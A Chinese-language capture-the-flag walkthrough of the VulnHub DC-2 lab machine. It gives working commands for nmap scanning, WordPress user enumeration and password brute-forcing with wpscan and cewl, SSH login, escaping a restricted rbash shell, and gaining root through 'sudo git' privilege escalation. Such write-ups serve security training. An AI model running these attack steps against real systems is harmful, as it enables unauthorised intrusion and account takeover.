DC2靶机渗透
今天我们来学习D2靶机渗透找出所有flag
开始进行靶机下载地址:
链接: https://www.vulnhub.com/entry/dc-2,311/
在靶机下载后,将模式改为NAT模式,重启靶机
第一步:靶机信息收集
// nmap查询存活主机
nmap -sP 192.168.109.0/24
发现靶机IP
查看开放端口
// nmap查询查询开放端口
nmap -sV -p- 192.168.109.136
打开网页,发现页面无法访问
第二步:查找flag1
尝试修改/etc/host 配置(kali设置)
尝试修改C:\Windows\System32\drivers\etc\hosts(windows设置)
成功访问页面,然后开启点点点,查找flag
发现flag1
第三步:查找flag2(wpscan暴力破解)
嗯。。。给了个提示cewl (和字典有关,应该要破解密码用)先不管,还有用户名的提示,发现cms是wordpress 用wpscan扫描一下网页列出站点的用户名、账号
// wpscan扫描用户名
wpscan --url dc-2 -e u
不理解wpscan放入小伙伴参考大佬写的链接
链接: https://zhuanlan.zhihu.com/p/149725645
–url|-u 要扫描的’WordPress站点
–enumerate | -e [option(s)] 枚举
u 枚举用户名(默认10个)
简单罗列出三个用户名和相关信息
将用户名写入user.txt文件,方便后续破解密码
根据flag1给的提示cewl生成字典dict.txt
// cewl生成dict.txt字典
cewl dc-2 -w dict.txt
cewl全指南命令链接如下
链接: https://www.freebuf.com/articles/network/190128.html
字典有了,用户名有了,开始破解密码
// wpscan暴力破解
wpscan --url dc-2 -U user.txt -P dict.txt
-U:用户名文件
-P:字典文件
(有路径的要写上路径)
破解成功
去网页找找登录框。我喜欢用御剑,小伙伴们自行选择
登录成功,点点点,发现flag2
第四步:查找flag3
根据提示还有另一种方法
嗯。。。记得之前扫描端口时候开通了ssh 现在有用户名密码,试试看可不可登录呢。。
// ssh 连接(加端口号)
ssh tom@192.168.109.136 -p 7744
成功用tom用户进入
成功发现flag3,用vi编辑打开查看
第五步:查找flag4(绕过rbash)
翻译过来意思好像是回到jerry用户上, 又看到有su提示尝试切换到jerry
看来需要绕过rbash,设置shell变量
// 绕过rbash
tom@DC-2:~$ whoami
-rbash: whoami: command not found
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ cat flag3.txt
发现flag3可以用cat命令查看了
在试着切换到jerry用户下
// An highlighted block
tom@DC-2:~$ su jerry
Password:
jerry@DC-2:/home/tom$ cd /home/jerry
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
发现flag4
第五步:查找最终flag(git提权)
提示git 想到是否为git提权 root用户查询最终flag呢
// git提权
jerry@DC-2:~$ sudo git -p help config
:!/bin/sh
提权成功,查找最终flag
//
# whoami
root
# ls
flag4.txt
# ls /root
final-flag.txt
# cat /root/final-flag.txt
获得最终的flag
完结 撒花✿✿ヽ(°▽°)ノ✿